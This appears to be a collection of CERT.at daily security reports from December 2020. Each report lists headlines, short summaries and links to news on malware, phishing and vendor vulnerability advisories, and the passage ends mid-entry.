Streaming-Plattformen, die in die Abofalle führen. Derzeit gehen zahlreiche Meldungen bei uns ein, die vor myusenet.de, foxusenet.de bigusenet.de und megausenet.de warnen. Diese neuen Streaming-Plattformen sehen zwar anders aus als die üblichen Fake-Streaming-Plattformen, die Masche bleibt aber die gleiche: Nach einer Registrierung, erhalten Sie eine Zahlungsaufforderung von 384 Euro. --------------------------------------------- https://www.watchlist-internet.at/news/myusenetde-bigusenetde-co-neue-betru… ∗∗∗ Update now: Researchers warn of security vulnerabilities in these widely used point-of-sale terminals ∗∗∗ --------------------------------------------- Security researchers disclose vulnerabilities including default passwords in two of the largest PoS manufacturers in the world. --------------------------------------------- https://www.zdnet.com/article/update-now-researchers-warn-of-security-vulne… ===================== = Vulnerabilities = ===================== ∗∗∗ Adobe Releases Security Updates for Acrobat and Reader ∗∗∗ --------------------------------------------- Adobe has released security updates to address a vulnerability in Acrobat and Reader. An attacker could exploit this vulnerability to obtain sensitive information. --------------------------------------------- https://us-cert.cisa.gov/ncas/current-activity/2020/12/10/adobe-releases-se… ∗∗∗ Hotfix rüstet Firewalls und Router von Sophos gegen Attacken ∗∗∗ --------------------------------------------- Unter bestimmten Voraussetzungen könnten Angreifer das Netzwerkbetriebssystem Cyberoam attackieren. --------------------------------------------- https://heise.de/-4986665 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (minidlna and x11vnc), Fedora (pam), openSUSE (chromium, minidlna, nsd, openssl-1_1, and pngcheck), SUSE (gcc7 and kernel), and Ubuntu (lxml and squirrelmail). --------------------------------------------- https://lwn.net/Articles/839861/ ∗∗∗ OpenSSL vulnerability CVE-2020-1968 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K92451315 ∗∗∗ F5 TMM vulnerability CVE-2020-5950 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K05204103 ∗∗∗ F5 TMUI XSS vulnerability CVE-2020-5948 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K42696541 ∗∗∗ TMM vulnerability CVE-2020-27713 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K37960100 ∗∗∗ BIG-IP LTM vulnerability CVE-2020-5949 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K20984059 ∗∗∗ Security Bulletin: IBM Resilient Platform could allow formula injection in Excel (CVE-2020-4633) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-platform-co… ∗∗∗ Security Bulletin: NGINX vulnerability CVE-2019-20372 impacts IBM Aspera High-Speed Transfer Server and Aspera High-Speed Transfer Endpoint versions prior to V4.0 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-nginx-vulnerability-cve-2… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a buffer overflow (CVE-2020-4701) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: Fixed CP4D timeout for IBM Netezza for Cloud Pak for Data 11.1.1.0 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-fixed-cp4d-timeout-for-ib… ∗∗∗ Security Bulletin: OpenSSL vulnerability CVE-2020-1968 impacts IBM Aspera Streaming/IBM Aspera Streaming for Video version 3.9.6.1 and earlier ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-openssl-vulnerability-cve… ∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is vulnerable to code injection and Denial of Service attacks ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce… ∗∗∗ Security Bulletin: HAProxy vulnerability CVE-2019-18277 impacts IBM Aspera High-Speed Transfer Server and Aspera High-Speed Transfer Endpoint versions prior to V4.0 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-haproxy-vulnerability-cve… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to buffer overflow leading to a privileged escalation (CVE-2020-4363) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure. (CVE-2020-4387) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: App Connect Enterprise Certified Container Integration Servers could cause a Denial of Service or a buffer overflow when using MQ ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 10.12.2020
by Daily end-of-shift report 10 Dec '20

10 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 10-12-2020 18:00 − Donnerstag 10-12-2020 18:00 Handler: Stephan Richter Co-Handler: Dimitri Robl ===================== = News = ===================== ∗∗∗ Qbot malware switched to stealthy new Windows autostart method ∗∗∗ --------------------------------------------- A new Qbot malware version now activates its persistence mechanism right before infected Windows devices shutdown and it automatically removes any traces when the system restarts or wakes up from sleep. --------------------------------------------- https://www.bleepingcomputer.com/news/security/qbot-malware-switched-to-ste… ∗∗∗ Adobe Flash Player: Jetzt ist endgültig Schluss ∗∗∗ --------------------------------------------- Seit Jahren wird das Ende des Adobe Flash Players verkündet. Im Januar 2021 soll es nun aber tatsächlich so weit sein. --------------------------------------------- https://www.golem.de/news/adobe-flash-player-jetzt-ist-endgueltig-schluss-2… ∗∗∗ Python Backdoor Talking to a C2 Through Ngrok, (Thu, Dec 10th) ∗∗∗ --------------------------------------------- I spotted a malicious Python script that implements a backdoor. The interesting behavior is the use of Ngrok to connect to the C2 server. Ngrok has been used for a while by attackers. Like most services available on the Internet, it has been abused by attackers for a long time. --------------------------------------------- https://isc.sans.edu/diary/rss/26866 ∗∗∗ PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL ∗∗∗ --------------------------------------------- PGMiner is a novel Linux-based cryptocurrency mining botnet that exploits a disputed PostgreSQL remote code execution vulnerability.The post PGMiner: New Cryptocurrency Mining Botnet Delivered via PostgreSQL appeared first on Unit42. --------------------------------------------- https://unit42.paloaltonetworks.com/pgminer-postgresql-cryptocurrency-minin… ∗∗∗ Hackers are selling more than 85,000 SQL databases on a dark web portal ∗∗∗ --------------------------------------------- Hackers break into databases, steal their content, hold it for ransom for 9 days, and then sell to the highest bidder if the DB owner doesnt want to pay the ransom demand. --------------------------------------------- https://www.zdnet.com/article/hackers-are-selling-more-than-85000-sql-datab… ∗∗∗ Proof-of-concept exploit code published for new Kerberos Bronze Bit attack ∗∗∗ --------------------------------------------- The Kerberos Bronze Bit attack can allow intruders to bypass authentication and access sensitive network services. --------------------------------------------- https://www.zdnet.com/article/proof-of-concept-exploit-code-published-for-n… ===================== = Vulnerabilities = ===================== ∗∗∗ Reflected XSS in PageLayer Plugin Affects Over 200,000 WordPress Sites ∗∗∗ --------------------------------------------- On November 4, 2020, the Wordfence Threat Intelligence team found two reflected Cross-Site Scripting (XSS) vulnerabilities in PageLayer, a WordPress plugin installed on over 200,000 sites. These vulnerabilities could lead to an attacker executing malicious Javascript in an administrator’s browser, which could lead to takeover of a vulnerable WordPress site. We contacted the plugin’s publisher, ...Read MoreThe post Reflected XSS in PageLayer Plugin Affects Over 200,000 WordPress --------------------------------------------- https://www.wordfence.com/blog/2020/12/reflected-xss-in-pagelayer-plugin-af… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (ant, cimg, containerd, libproxy, libproxy-mozjs, libproxy-webkit, libslirp, python-lxml, tomcat8, tomcat9, and xorg-server), CentOS (firefox and thunderbird), Debian (apt, linux-4.19, python-apt, and sqlite3), Fedora (ceph, chromium, containerd, matrix-synapse, mingw-openjpeg2, openjpeg2, python-authlib, python-canonicaljson, and spice-gtk), Mageia (chromium-browser-stable), openSUSE (chromium and pngcheck), Slackware (curl), SUSE (clamav, curl, --------------------------------------------- https://lwn.net/Articles/839668/ ∗∗∗ Serious Vulnerabilities in Dualog Connection Suite ∗∗∗ --------------------------------------------- TL;DR The flaws found in this maritime comms and connection suite were many, and not insignificant: Directory traversal 2FA challenge/response is performed in a client-side application Default install password SQL […]The post Serious Vulnerabilities in Dualog Connection Suite first appeared on Pen Test Partners. --------------------------------------------- https://www.pentestpartners.com/security-blog/serious-vulnerabilities-in-du… ∗∗∗ Medtronic MyCareLink ∗∗∗ --------------------------------------------- This advisory contains mitigations for Improper Authentication, Heap-based Buffer Overflow, and Time-of-check Time-of-use Race Condition vulnerabilities in the Medtronic MyCareLink Patient Reader. --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsma-20-345-01 ∗∗∗ Mitsubishi Electric MELSEC iQ-F Series ∗∗∗ --------------------------------------------- This advisory contains mitigations for an Improper Check or Handling of Exceptional Conditions vulnerability in Mitsubishi Electrics MELSEC iQ-F series FX5U(C) CPU modules. --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-345-01 ∗∗∗ Host Engineering H2-ECOM100 Module ∗∗∗ --------------------------------------------- This advisory contains mitigations for an Improper Input Validation vulnerability in the Host Engineering ECOM100 Module, an Ethernet communications module for PLC systems. --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-345-02 ∗∗∗ Gafgyt Using Pulse Secure Vulnerability ∗∗∗ --------------------------------------------- SummaryA vulnerability in Pulse Secures Connect VPN framework is allowing for exploitation by Gafgyt. Avira details how this exploit works in a new blog.Threat TypeMalware, VulnerabilityOverviewAvira Labs has observed an increase in IoT malware binaries. These binaries have the capability to exploit CVE-2020-8218. This increase led to the discovery of a new variant of Gafgyt. Its functionality is mostly the same as the original Gafgyt with some inclusion of functionality from other malware --------------------------------------------- https://exchange.xforce.ibmcloud.com/collection/02145e80d8a7b87b486015b3588… ∗∗∗ Cisco Jabber Desktop and Mobile Client Software Vulnerabilities ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Security Bulletin: Vulnerabilities in Node.js affect IBM App Connect Enterprise V11 ( CVE-2020-8244) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-node-j… ∗∗∗ Security Bulletin: Vulnerabilities in OpenSSL affect IBM Integration Bus and IBM App Connect (CVE-2019-1552) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openss… ∗∗∗ Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Node.js ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-watson-discovery-for-… ∗∗∗ Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Apache Commons Codec ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-watson-discovery-for-… ∗∗∗ Security Bulletin: Multiple vulnerabilities affect IBM® SDK for Node.js™ in IBM Cloud ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… ∗∗∗ Security Bulletin: Vulnerability in Hibernate Validator affects Liberty for Java for IBM Cloud (CVE-2020-10693) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-hibernat… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a buffer overflow (CVE-2020-4701) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: JRE vulnerability (CVEID: 178768) impacts IBM Aspera High-Speed Transfer Server/IBM Aspera High-Speed Transfer Endpoint version 3.9.6.2 and earlier ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-jre-vulnerability-cveid-1… ∗∗∗ Security Bulletin: Vulnerability in ksu affects AIX (CVE-2020-4829) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ksu-affe… ∗∗∗ Symantec Messaging Gateway: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-1222 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 09.12.2020
by Daily end-of-shift report 09 Dec '20

09 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Montag 07-12-2020 18:00 − Mittwoch 09-12-2020 18:00 Handler: Stephan Richter Co-Handler: Thomas Pribitzer ===================== = News = ===================== ∗∗∗ Credit card stealing malware bundles backdoor for easy reinstall ∗∗∗ --------------------------------------------- An almost impossible to remove malware set to automatically activate on Black Friday was deployed on multiple Magento-powered online stores by threat actors according to researchers at Dutch cyber-security company Sansec. --------------------------------------------- https://www.bleepingcomputer.com/news/security/credit-card-stealing-malware… ∗∗∗ Microsoft fixes new Windows Kerberos security bug in staged rollout ∗∗∗ --------------------------------------------- Microsoft has issued security updates to address a Kerberos security feature bypass vulnerability impacting multiple Windows Server versions in a two-phase staged rollout. --------------------------------------------- https://www.bleepingcomputer.com/news/security/microsoft-fixes-new-windows-… ∗∗∗ IT-Security: Hacker klauen Hacking-Werkzeuge von Fireeye ∗∗∗ --------------------------------------------- Das Security-Unternehmen versucht nun, das Schlimmste zu verhindern und gibt Tipps gegen die eigenen Angriffswerkzeuge. --------------------------------------------- https://www.golem.de/news/it-security-hacker-klauen-hacking-werkzeuge-von-f… ∗∗∗ OpenSSL behebt Speicherfehler ∗∗∗ --------------------------------------------- Ein Update beseitigt einen Null-Pointer-Zugriff, der laut Advisory zum Absturz führen kann. --------------------------------------------- https://heise.de/-4985050 ∗∗∗ Threat Assessment: Egregor Ransomware ∗∗∗ --------------------------------------------- Unit 42 shares courses of action that can help mitigate tactics, techniques and procedures used with Egregor ransomware. --------------------------------------------- https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/ ∗∗∗ njRAT Spreading Through Active Pastebin Command and Control Tunnel ∗∗∗ --------------------------------------------- Malware authors have been leveraging njRAT (AKA Bladabindi), a Remote Access trojan), to download and deliver second-stage payloads from Pastebin. --------------------------------------------- https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control/ ∗∗∗ Achtung: Kriminelle versenden betrügerische Mails im Namen von FinanzOnline ∗∗∗ --------------------------------------------- Derzeit versenden BetrügerInnen zahlreiche E-Mails im Namen des Finanzamtes. Angeblich würden Sie eine Steuerrückerstattung von 1.850 Euro bekommen. --------------------------------------------- https://www.watchlist-internet.at/news/achtung-kriminelle-versenden-betrueg… ===================== = Vulnerabilities = ===================== ∗∗∗ Command Injection: NSA warnt vor VMware-Lücke ∗∗∗ --------------------------------------------- Der US-Geheimdienst NSA sieht russische Akteure hinter Angriffen auf eine Sicherheitslücke in VMware-Produkten. --------------------------------------------- https://www.golem.de/news/command-injection-nsa-warnt-vor-vmware-luecke-201… ∗∗∗ D-Link Routers at Risk for Remote Takeover from Zero-Day Flaws ∗∗∗ --------------------------------------------- Critical vulnerabilities discovered by Digital Defense can allow attackers to gain root access and take over devices running same firmware. --------------------------------------------- https://threatpost.com/d-link-routers-zero-day-flaws/162064/ ∗∗∗ Zero-Click Wormable RCE Vulnerability Reported in Microsoft Teams ∗∗∗ --------------------------------------------- A zero-click remote code execution (RCE) bug in Microsoft Teams desktop apps could have allowed an adversary to execute arbitrary code by merely sending a specially-crafted chat message and compromise a targets system. --------------------------------------------- https://thehackernews.com/2020/12/zero-click-wormable-rce-vulnerability.html ∗∗∗ ZDI-20-1400: (0Day) Realtek RTL8811AU Wi-Fi Driver rtwlane Out-Of-Bounds Write Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of the Realtek RTL8811AU Wi-Fi driver. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1400/ ∗∗∗ ZDI-20-1399: (0Day) Realtek RTL8811AU Wi-Fi Driver rtwlanu Out-Of-Bounds Write Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of the Realtek RTL8811AU Wi-Fi driver. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1399/ ∗∗∗ Jetzt updaten: Cisco schiebt Update für Security-Manager-Lücke von November nach ∗∗∗ --------------------------------------------- Für eine Sicherheitslücke mit "High"-Einstufung im Security Manager stand noch ein Fix aus. Da Proof-of-Concept-Code online ist, sollten Nutzer jetzt handeln. --------------------------------------------- https://heise.de/-4983238 ∗∗∗ Patchday: Microsoft stopft kritische Lücken in Exchange Server ∗∗∗ --------------------------------------------- Für unter anderem Hyper-V, Office und Windows stehen wichtige Sicherheitsupdates zum Download bereit. Einige Lücken gelten als kritisch. --------------------------------------------- https://heise.de/-4984254 ∗∗∗ Kritische Lücke im Python-Framework PyYAML bedroht IBM Spectrum Protect ∗∗∗ --------------------------------------------- IBM hat unter anderem für IBM Db2 und Spectrum Protect wichtige Sicherheitsupdates veröffentlicht. --------------------------------------------- https://heise.de/-4983755 ∗∗∗ Patchday: Adobe schließt kritische Lücken - aber nicht in Flash ∗∗∗ --------------------------------------------- Sicherheitspatches schließen Schadcode-Lücken in Adobe Experience Manager, Lightroom und Prelude. --------------------------------------------- https://heise.de/-4984303 ∗∗∗ Patchday: SAP-Updates versperren Angriffswege über teils kritische Lücken ∗∗∗ --------------------------------------------- Neben einer NetWeaver-Schwachstelle mit dem CVSS-"Highscore" 10 hat SAP zum Patchday noch zahlreiche weitere Sicherheitsprobleme aus seinen Produkten entfernt. --------------------------------------------- https://heise.de/-4984262 ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (minidlna, openssl, and trafficserver), Mageia (oniguruma, php-pear, python, python3, and x11vnc), openSUSE (minidlna), Oracle (kernel and net-snmp), Red Hat (kernel, mariadb-galera, microcode_ctl, and net-snmp), Slackware (seamonkey), SUSE (thunderbird and xen), and Ubuntu (xorg-server). --------------------------------------------- https://lwn.net/Articles/839311/ ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (golang-golang-x-net-dev, python-certbot, and xorg-server), Fedora (resteasy, scap-security-guide, and vips), openSUSE (chromium, python, and rpmlint), SUSE (kernel), and Ubuntu (aptdaemon, curl, gdk-pixbuf, lxml, and openssl, openssl1.0). --------------------------------------------- https://lwn.net/Articles/839481/ ∗∗∗ December 2020 Android Updates Patch 46 Vulnerabilities ∗∗∗ --------------------------------------------- A total of 46 vulnerabilities were addressed this week with the release of the December 2020 security updates for Android. --------------------------------------------- https://www.securityweek.com/december-2020-android-updates-patch-46-vulnera… ∗∗∗ Amnesia:33: TCP/IP-Schwachstellen gefährden Millionen internetfähige Geräte ∗∗∗ --------------------------------------------- Die 33 Anfälligkeiten verteilen sich auf vier Open-Source-Bibliotheken. Hersteller integrieren die Bibliotheken wiederum in die Firmware von Routern, Switches, Druckern und vielen anderen Geräten. Oftmals bieten diese keine Option zur Aktualisierung der Gerätesoftware. --------------------------------------------- https://www.zdnet.de/88390349/amnesia33-tcp-ip-schwachstellen-gefaehrden-mi… ∗∗∗ GE Healthcare Imaging and Ultrasound Products ∗∗∗ --------------------------------------------- This advisory contains mitigations for Unprotected Transport of Credentials, and Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in select GE Healthcare Imaging and Ultrasound products. --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsma-20-343-01 ∗∗∗ ICS-CERT Security Advisories - December 8th, 2020 ∗∗∗ --------------------------------------------- SummaryICS-CERT has released nine security advisories addressing vulnerabilities in ICS-related devices and software. --------------------------------------------- https://exchange.xforce.ibmcloud.com/collection/7b486a6b0dbeee0d5e268e11454… ∗∗∗ Cisco AnyConnect Secure Mobility Client Arbitrary Code Execution Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ IBM Security Bulletins ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/ ∗∗∗ Security Advisory - Information Disclosure Vulnerability in TE Mobile Software ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201209-… ∗∗∗ Security Advisory - CSV Injection Vulnerability in iManager NetEco Product ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201209-… ∗∗∗ LibTIFF vulnerability CVE-2018-18557 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K70117303 ∗∗∗ Linux kernel vulnerability CVE-2017-10661 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K04337834 ∗∗∗ Linux kernel vulnerability CVE-2017-18344 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K07020416 ∗∗∗ NGINX Controller Agent vulnerability CVE-2020-27730 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K43530108 ∗∗∗ Linux kernel vulnerability CVE-2018-18397 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K83102920 ∗∗∗ Linux kernel vulnerability CVE-2018-1120 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K42202505 ∗∗∗ Citrix Secure Mail for Android Security Update ∗∗∗ --------------------------------------------- https://support.citrix.com/article/CTX286763 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 07.12.2020
by Daily end-of-shift report 07 Dec '20

07 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 04-12-2020 18:00 − Montag 07-12-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Finanzmarktaufsicht und Bundeskriminalamt warnen vor Geldwäsche-Jobs ∗∗∗ --------------------------------------------- Warnung: Professionelle Geldwäscher versuchen Jobsuchende als Finanzagent anzuwerben und zur Geldwäscherei zu missbrauchen. --------------------------------------------- https://www.watchlist-internet.at/news/finanzmarktaufsicht-und-bundeskrimin… ∗∗∗ Sicherheitslücke: Remote Code Execution in Microsoft Teams ∗∗∗ --------------------------------------------- Im Desktop-Client von Microsoft Teams fand sich eine extrem kritische Sicherheitslücke, aber Microsoft hat das Problem heruntergespielt. --------------------------------------------- https://www.golem.de/news/sicherheitsluecke-remote-code-execution-in-micros… ∗∗∗ What is Ransomware - 15 Easy Steps To Protect Your System [Updated 2020] ∗∗∗ --------------------------------------------- May 12th 2017 saw the biggest ever cyber attack in Internet history (yes, bigger than the Dyn DDoS). A ransomware named WannaCry stormed through the web, with the damage epicenter being in Europe. WannaCry leveraged a vulnerability in Windows OS, first discovered by the NSA, and then publicly revealed to the world by the Shadow [...] --------------------------------------------- https://heimdalsecurity.com/blog/what-is-ransomware-protection/ ∗∗∗ Obfuscation Techniques in MARIJUANA Shell "Bypass" ∗∗∗ --------------------------------------------- Attackers are always trying to come up with new ways to evade detection from the wide range of security controls available for web applications. This also extends to malware like PHP shells, which are typically left on compromised websites as a backdoor to maintain unauthorized access. MARIJUANA is the name of a PHP shell that we have been tracking since last year. --------------------------------------------- https://blog.sucuri.net/2020/12/obfuscation-techniques-in-marijuana-shell-b… ∗∗∗ Payment Card Skimmer Group Using Raccoon Info-Stealer to Siphon Off Data ∗∗∗ --------------------------------------------- A cybercrime group known for targeting e-commerce websites unleashed a "multi-stage malicious campaign" earlier this year designed with an intent to distribute information stealers and JavaScript-based payment skimmers. In a new report published today and shared with The Hacker News, Singapore-based cybersecurity firm Group-IB attributed the operation to the same group thats been linked to a [...] --------------------------------------------- https://thehackernews.com/2020/12/payment-card-skimmer-group-using.html ∗∗∗ Exploitation of Windows RDP Vulnerability CVE-2019-0708 (BlueKeep): Get RCE with System Privilege Using Refresh Rect PDU and RDPDR Client Name Request PDU ∗∗∗ --------------------------------------------- To better protect Windows users, we discuss how attackers might exploit CVE-2019-0708 (BlueKeep) on Windows RDP endpoints. --------------------------------------------- https://unit42.paloaltonetworks.com/cve-2019-0708-bluekeep/ ∗∗∗ Shodan Verified Vulns 2020-12 ∗∗∗ --------------------------------------------- Auch im Dezember wollen wir einen Blick auf Schwachstellen werfen, die Shodan in Österreich sieht. Die folgende Grafik basiert auf den Daten vom 2020-12-01: [...] --------------------------------------------- https://cert.at/de/aktuelles/2020/12/shodan-verified-vulns-2020-12 ===================== = Vulnerabilities = ===================== ∗∗∗ QNAP patches QTS vulnerabilities allowing NAS device takeover ∗∗∗ --------------------------------------------- Network-attached storage (NAS) maker QNAP today released security updates to address vulnerabilities that could enable attackers to take control of unpatched NAS devices following successful exploitation. --------------------------------------------- https://www.bleepingcomputer.com/news/security/qnap-patches-qts-vulnerabili… ∗∗∗ Cisco Security Manager Java Deserialization Vulnerabilities ∗∗∗ --------------------------------------------- Multiple vulnerabilities in the Java deserialization function that is used by Cisco'Security Manager could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device. --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (ceph, gitea, matrix-synapse, musl, mutt, neomutt, opensc, and webkit2gtk), Debian (debian-security-support, openldap, salt, xen, and xorg-server), Fedora (fossil, pdfresurrect, tcpdump, thunderbird, and xorg-x11-server), Gentoo (chromium, firefox, mariadb, pam, postgresql, seamonkey, thunderbird, and xorg-server), Mageia (mutt, pdfresurrect, privoxy, and thunderbird), openSUSE (chromium, java-1_8_0-openjdk, kernel, minidlna, neomutt, opera, [...] --------------------------------------------- https://lwn.net/Articles/839198/ ∗∗∗ HPE HP-UX: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1199 ∗∗∗ Security Bulletin: Vulnerability in PyYAML affects IBM Spectrum Protect Plus Container and Microsoft File Systems Agents (CVE-2020-1747) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-pyyaml-a… ∗∗∗ Security Bulletin: Denial of Service Vulnerability in Chart.js affects IBM Spectrum Protect Plus (CVE-2020-7746) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-vulnera… ∗∗∗ Security Bulletin: Upgrade to IBP v2.5.1 to address recent concerns/issues with Golang versions other than 1.14.7 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-upgrade-to-ibp-v2-5-1-to-… ∗∗∗ Security Bulletin: Vulnerability in Urllib3 affects IBM Spectrum Protect Container and Microsoft File Systems Agents (CVE-2020-26137) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-urllib3-… ∗∗∗ Public Service Announcement ∗∗∗ --------------------------------------------- Due to Dec 8 being a public holiday in Austria the next End-of-Day report will be published on Dec 9. --------------------------------------------- https://en.wikipedia.org/wiki/Feast_of_the_Immaculate_Conception -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.12.2020
by Daily end-of-shift report 04 Dec '20

04 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 03-12-2020 18:00 − Freitag 04-12-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Achtung! Amazon-Phishing Mails boomen derzeit! ∗∗∗ --------------------------------------------- Der Black Friday ist vorbei, Weihnachten steht vor der Tür und Österreich befindet sich nach wie vor im Lockdown. All das sind Gründe, wieso der Online-Handel derzeit boomt – genauso boomen jedoch betrügerische Nachrichten, die im Namen von Amazon verschickt werden. Aktuell kursieren E-Mails, bei denen BetrügerInnen Ihnen eine doppelte Abbuchung vorgaukeln, um an Ihre Daten zu kommen. --------------------------------------------- https://www.watchlist-internet.at/news/achtung-amazon-phishing-mails-boomen… ∗∗∗ Malware für den Diebstahl von Finanzdaten versteckt sich hinter Social-Media-Buttons ∗∗∗ --------------------------------------------- Die Buttons erlauben angeblich das Teilen von Inhalten per Facebook, Twitter und Instagram. Stattdessen aktivieren sie Schadcode, der es auf persönliche Informationen und Kreditkartendaten abgesehen hat. Die zugehörige Malware ist bereits seit Ende September im Umlauf. --------------------------------------------- https://www.zdnet.de/88390301/malware-fuer-den-diebstahl-von-finanzdaten-ve… ∗∗∗ Cybercrime: Trickbot lernt neuen Trick ∗∗∗ --------------------------------------------- Emotet-Infektionen werden zukünftig noch gefährlicher. Denn die nachgeladene Malware könnte sich im BIOS festsetzen. --------------------------------------------- https://heise.de/-4980197 ∗∗∗ Forscher warnen vor teils noch ungefixter Schwachstelle in diversen Android-Apps ∗∗∗ --------------------------------------------- Die ehemals verwundbare, durch Google bereits im März reparierte Play Core-Library wurde durch manche App-Entwickler (noch) nicht aktiv aktualisiert. --------------------------------------------- https://heise.de/-4979478 ∗∗∗ The chronicles of Emotet ∗∗∗ --------------------------------------------- More than six years have passed since the banking Trojan Emotet was first detected. During this time it has repeatedly mutated, changed direction, acquired partners, picked up modules, and generally been the cause of high-profile incidents and multimillion-dollar losses. --------------------------------------------- https://securelist.com/the-chronicles-of-emotet/99660/ ∗∗∗ Leaking Browser URL/Protocol Handlers ∗∗∗ --------------------------------------------- An important step in any targeted attack is reconnaissance. The more information an 